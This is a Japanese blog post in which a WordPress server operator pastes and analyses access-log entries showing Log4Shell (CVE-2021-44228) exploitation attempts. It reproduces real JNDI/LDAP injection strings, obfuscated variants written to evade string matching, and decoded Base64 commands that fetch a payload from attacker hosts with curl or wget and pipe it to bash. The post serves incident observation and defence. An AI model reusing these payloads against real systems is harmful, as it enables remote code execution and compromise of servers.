CVE-2021-44228 (Log4Shell) アクセス・ログのメモ

Posted on by Tony3

CVE-2021-44228 (Log4Shell) の脆弱性の悪用の試みが世界中で報告されている。自分の運用しているWordPressサーバーにも案の定、細工されたリクエストが送られていた。

参考までにアクセス・ログを貼っておく。

zgrep -i "jndi\|\${" access.log* | cut -f 2,3,6 -d '"' | sort -u

# zgrep -i "jndi\|\${" access.log* | cut -f 2,3,6 -d '"' | sort -u
GET / HTTP/1.1" 200 12907 "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228[.]com/http443useragent}
GET / HTTP/1.1" 200 13144 "${jndi:ldap://log4shell.huntress[.]com:1389/4ac61c12-0c8c-4552-95f0-dfa4053b4577}
GET / HTTP/1.1" 200 13492 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET / HTTP/1.1" 200 13501 "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164[.]160:8081/w}
GET / HTTP/1.1" 200 13502 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1.${hostName}.}
GET / HTTP/1.1" 200 13502 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13502 "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13502 "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13502 "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13528 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET / HTTP/1.1" 200 13538 "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j[.]bin${upper:a}ryedge[.]io:80/callback}
GET / HTTP/1.1" 200 13559 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET / HTTP/1.1" 200 13573 "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j[.]bin${upper:a}ryedge[.]io:80/callback}
GET / HTTP/1.1" 301 417 "${jndi:ldap://71ssmbjqg7ezpoqt8okre7gzu.canarytokens[.]com/a
GET / HTTP/1.1" 301 417 "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228[.]com/http80useragent}
GET / HTTP/1.1" 301 417 "/${jndi:ldap://45.130.229[.]168:1389/Exploit}
GET / HTTP/1.1" 301 436 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET / HTTP/1.1" 301 473 "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j[.]bin${upper:a}ryedge[.]io:80/callback}
GET / HTTP/1.1" 301 5357 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164[.]160:8081/w}
GET / HTTP/1.1" 301 5357 "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET /$%7Bjndi:dns://45.83.64[.]1/securityscan-http80%7D HTTP/1.1" 301 503 "${jndi:dns://45.83.64[.]1/securityscan-http80}
GET /$%7Bjndi:dns://45.83.64[.]1/securityscan-https443%7D HTTP/1.1" 404 4883 "${jndi:dns://45.83.64[.]1/securityscan-https443}
GET /$%7Bjndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4dd5000002ed8b66100000000f8a500%7D?${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4dd5000012ed8b661000000007b0383}=${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4dd5000022ed8b661000000005e60bd} HTTP/1.1" 400 392 "${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4dd5000082ed8b661000000008d7023}
GET /$%7Bjndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4ddbb0100052bb761000000008284a8%7D?${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4ddbb0101052bb76100000000551a4a}=${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4ddbb0102052bb7610000000098988a} HTTP/1.1" 400 5522 "${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4ddbb0108052bb76100000000706864}
GET /$%7Bjndi:ldap://167.71.13[.]196:443/lx-ffff80c7b4ddbb0100528cb76100000000cdd757%7D?${jndi:ldap://167.71.13[.]196:443/lx-ffff80c7b4ddbb0101528cb76100000000eac427}=${jndi:ldap://167.71.13[.]196:443/lx-ffff80c7b4ddbb0102528cb76100000000826b15} HTTP/1.1" 400 5522 "${jndi:ldap://167.71.13[.]196:443/lx-ffff80c7b4ddbb0108528cb76100000000ea26ee}
GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228[.]com/http443path%7D HTTP/1.1" 404 4883 "Kryptos Logic Telltale
GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228[.]com/http80path%7D HTTP/1.1" 301 551 "Kryptos Logic Telltale
GET /$%7Bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228[.]com/http80path%7D HTTP/1.1" 404 4883 "Kryptos Logic Telltale
GET /$%7Bjndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b%7D?${jndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b}=${jndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b} HTTP/1.1" 301 780 "${jndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b}
GET /?test=${jndi:ldap://c6ps4n2g4m3cu6krr8k0cg4y4gyyyh4e4.interact[.]sh/a} HTTP/1.1" 400 392 "Mozilla ${jndi:ldap://c6ps4n2g4m3cu6krr8k0cg4y4gyyyh4e4.interact[.]sh/a}
GET /?x=${jndi:ldap://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 200 13765 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=${jndi:ldap://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 301 836 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=} HTTP/1.1" 301 5558 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET /?x=${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 200 13763 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 301 836 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g= HTTP/1.1" 200 13726 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET /favicon.ico HTTP/1.1" 404 418 "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j[.]bin${upper:a}ryedge[.]io:80/callback}
GET /favicon.ico HTTP/1.1" 404 418 "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j[.]bin${upper:a}ryedge[.]io:80/callback}

いくつか気になるログを拾ってみた。

45.146.164[.]160:1389へのアクセス試行

GET / HTTP/1.1" 200 13501 "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164[.]160:8081/w}
GET / HTTP/1.1" 200 13502 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13502 "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13502 "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13502 "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164[.]160:8081/w}
GET / HTTP/1.1" 301 5357 "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164[.]160:1389/t}

ed7d5ae0.probe001.log4j.leakix[.]net:1266へのアクセス試行

GET /$%7Bjndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b%7D?${jndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b}=${jndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b} HTTP/1.1" 301 780 "${jndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b}

c6ps4n2g4m3cu6krr8k0cg4y4gyyyh4e4.interact[.]shへのアクセス試行

GET /?test=${jndi:ldap://c6ps4n2g4m3cu6krr8k0cg4y4gyyyh4e4.interact[.]sh/a} HTTP/1.1" 400 392 "Mozilla ${jndi:ldap://c6ps4n2g4m3cu6krr8k0cg4y4gyyyh4e4.interact[.]sh/a}

Base64コマンドの実行の試み

GET / HTTP/1.1" 200 13492 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET / HTTP/1.1" 200 13528 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET / HTTP/1.1" 200 13559 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET / HTTP/1.1" 301 436 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET / HTTP/1.1" 301 5357 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET /?x=${jndi:ldap://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 200 13765 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=${jndi:ldap://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 301 836 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=} HTTP/1.1" 301 5558 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET /?x=${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 200 13763 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 301 836 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g= HTTP/1.1" 200 13726 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}

実行しようとしていたBase64コマンドは以下の3種類。

  • KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=
  • KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo
  • KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo

それぞれ以下のBashコマンドにデコードされる。

  • (curl -s 45.155.205[.]233:5874/128.199.180[.]221:443||wget -q -O- 45.155.205[.]233:5874/128.199.180[.]221:443)|bash
  • (curl -s 195.54.160[.]149:5874/128.199.180[.]221:80||wget -q -O- 195.54.160[.]149:5874/128.199.180[.]221:80)|bash
  • (curl -s 45.155.205[.]233:5874/128.199.180[.]221:80||wget -q -O- 45.155.205[.]233:5874/128.199.180[.]221:80)|bash

45.155.205[.]233:5874195.54.160[.]149:5874から128.199.180[.]221 (本WordPressサーバー)にペイロードをダウンロードしてbashで実行しようとしている。(wget-O オプションの値に-が指定されているため、ペイロードは標準出力に書き込まれる。そのためダウンロードされたペイロードはディスクに残らない。)

jndiやldapの文字列の難読化

GET / HTTP/1.1" 200 13502 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1.${hostName}.}
GET / HTTP/1.1" 200 13501 "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164[.]160:8081/w}
GET / HTTP/1.1" 301 473 "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j[.]bin${upper:a}ryedge[.]io:80/callback}
GET / HTTP/1.1" 301 5357 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164[.]160:8081/w}
GET / HTTP/1.1" 301 5357 "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164[.]160:1389/t}

単純なstrings検索による検知を回避するため、jndildapの文字列に難読化を施している。

参考

https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
https://piyolog.hatenadiary.jp/entry/2021/12/13/045541

IT業従事者。2018年10月末よりシンガポール在住。

Leave a Reply

Your email address will not be published. Required fields are marked *